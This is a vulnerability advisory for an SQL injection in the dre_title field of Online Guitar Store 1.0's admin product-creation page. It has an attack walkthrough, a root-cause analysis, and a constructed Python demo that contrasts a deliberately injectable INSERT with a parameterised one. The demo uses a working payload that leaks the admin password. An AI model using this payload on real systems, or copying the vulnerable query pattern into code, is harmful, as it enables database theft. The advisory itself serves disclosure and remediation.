A vulnerability was found in code-projects Online Guitar Store 1.0. Affected is an unknown function of the file /admin/Create_product.php. Manipulation of the argument dre_title results in SQL injection. The attack can be carried out remotely. An exploit has been published and may be used.
Online Guitar Store 1.0 is affected by a SQL injection flaw rated critical, which lets an attacker remotely read or alter the application's database. The flaw is in /admin/Create_product.php; what an attacker can reach beyond the database depends on the privileges of the database account the application uses. Because the endpoint sits under /admin/, check whether an authenticated administrator session is needed to reach it before triaging: the advisory does not state this precondition. A public exploit raises the likelihood of exploitation.
Step 1: Payload Crafting: The attacker builds a SQL injection payload for the dre_title parameter handled by /admin/Create_product.php.
Step 2: Request Submission: The attacker sends a crafted HTTP POST request to the vulnerable endpoint with the payload in the dre_title parameter.
Step 3: Query Execution: The server-side PHP script processes the request and, because the parameter is not validated, splices the payload directly into the SQL statement it builds.
Step 4: Database Manipulation: The database server executes the altered statement. Depending on the payload, this reads, modifies or deletes data.
Step 5: Information Disclosure/System Compromise: The attacker uses the query results to obtain sensitive information (e.g., usernames, passwords or password hashes, product details) or, where the database account's privileges allow, goes further, for example by creating a backdoor user or escalating privileges.
The vulnerability stems from missing input validation and sanitisation of the dre_title parameter in /admin/Create_product.php: user-supplied data is concatenated into an SQL statement without escaping or filtering, so an attacker who places quote characters and SQL syntax in the parameter changes the meaning of the statement and can retrieve, modify or delete data. The root cause is the absence of parameterised queries (prepared statements), which bind values separately from the SQL text and would prevent the injection. The flaw most likely sits in the code that reads the product-creation form fields and builds the INSERT that stores the new product; a quick check is to look for $_POST['dre_title'] (or a variable derived from it) appearing inside a query string passed to the database call rather than to a prepared statement's bind step. Note that validation alone is not the fix; the query must be parameterised.
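The following is an added example, not code from the Online Guitar Store project. It reproduces the flaw class described above (the dre_title value spliced into an INSERT) beside the parameterised form, using Python and an in-memory SQLite database as a stand-in for the PHP/MySQL stack; the table and column names other than dre_title, the sample admin row, and the payload are all constructed for this demonstration. The payload closes the string literal, substitutes a scalar subquery for the next column, and comments out the rest of the statement, so the admin password is written into the product row and becomes readable wherever products are displayed.

```python
import sqlite3

# Constructed stand-in for the shop database. Everything here except the
# dre_title column name is an assumption for this example.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE products (id INTEGER PRIMARY KEY, dre_title TEXT, description TEXT);
INSERT INTO users (username, password) VALUES ('admin', 'hunter2');
"""

# Constructed payload for the dre_title POST field. The trailing space after
# "--" matters for MySQL-style line comments, so it is kept here as well.
PAYLOAD = "x', (SELECT password FROM users WHERE username='admin')) -- "


def fresh_db():
    """New in-memory database seeded with the constructed schema and data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def create_product_vulnerable(conn, dre_title, description):
    """Flaw class from the advisory: the field is concatenated into the SQL text,
    so a quote in dre_title rewrites the statement. Returns the SQL actually run."""
    sql = (
        "INSERT INTO products (dre_title, description) "
        f"VALUES ('{dre_title}', '{description}')"
    )
    conn.execute(sql)
    conn.commit()
    return sql


def create_product_safe(conn, dre_title, description):
    """Parameterised form: the driver binds the values, the SQL text is fixed."""
    conn.execute(
        "INSERT INTO products (dre_title, description) VALUES (?, ?)",
        (dre_title, description),
    )
    conn.commit()


def last_product(conn):
    """Row the shop front end would render for the newest product."""
    return conn.execute(
        "SELECT dre_title, description FROM products ORDER BY id DESC LIMIT 1"
    ).fetchone()


def demo():
    """Run the same payload through both code paths and return what got stored."""
    vuln = fresh_db()
    create_product_vulnerable(vuln, PAYLOAD, "Fender Stratocaster")
    leaked = last_product(vuln)      # ('x', 'hunter2'): password in the product row

    safe = fresh_db()
    create_product_safe(safe, PAYLOAD, "Fender Stratocaster")
    stored = last_product(safe)      # payload kept as an ordinary title string
    return leaked, stored


if __name__ == "__main__":
    leaked, stored = demo()
    print("vulnerable path stored:", leaked)
    print("parameterised path stored:", stored)
```

In the PHP application the equivalent fix is to use mysqli_prepare()/bind_param() or PDO::prepare() with bound parameters for the INSERT instead of interpolating $_POST values into the query string. Whether stacked statements (a second statement after a semicolon, e.g. to create a backdoor user) are also possible depends on the database API the application calls, which the advisory does not specify; the subquery payload above needs no such capability.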